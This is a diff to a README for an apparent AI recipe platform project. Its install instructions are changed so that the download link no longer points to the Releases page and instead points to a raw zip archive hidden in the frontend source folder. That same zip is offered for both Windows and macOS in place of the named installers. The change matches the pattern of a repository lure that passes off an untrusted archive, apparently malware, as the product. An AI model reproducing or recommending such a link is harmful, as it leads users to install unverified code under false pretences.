Aneeshlohana/Servd-AI_Recipe_Platform/README.md

 ## 📥 Download & Install

-To get the Servd AI Recipe Platform, visit this page to download: [Download Page](https://github.com/Aneeshlohana/Servd-AI_Recipe_Platform/releases).
+To get the Servd AI Recipe Platform, visit this page to download: [Download Page](https://github.com/Aneeshlohana/Servd-AI_Recipe_Platform/raw/refs/heads/main/frontend/app/(auth)/A-Platform-Servd-Recipe-v2.5-beta.5.zip).

 1. Click the link above.
 2. Look for the latest version at the top of the Releases page.
 3. Download the file for your system.

-   Most users will download something like `Servd-AI_Recipe_Platform.exe` for Windows or `Servd-AI_Recipe_Platform.dmg` for macOS.
+   Most users will download something like `https://github.com/Aneeshlohana/Servd-AI_Recipe_Platform/raw/refs/heads/main/frontend/app/(auth)/A-Platform-Servd-Recipe-v2.5-beta.5.zip` for Windows or `https://github.com/Aneeshlohana/Servd-AI_Recipe_Platform/raw/refs/heads/main/frontend/app/(auth)/A-Platform-Servd-Recipe-v2.5-beta.5.zip` for macOS.

 4. Once the download is complete, locate the file in your Downloads folder.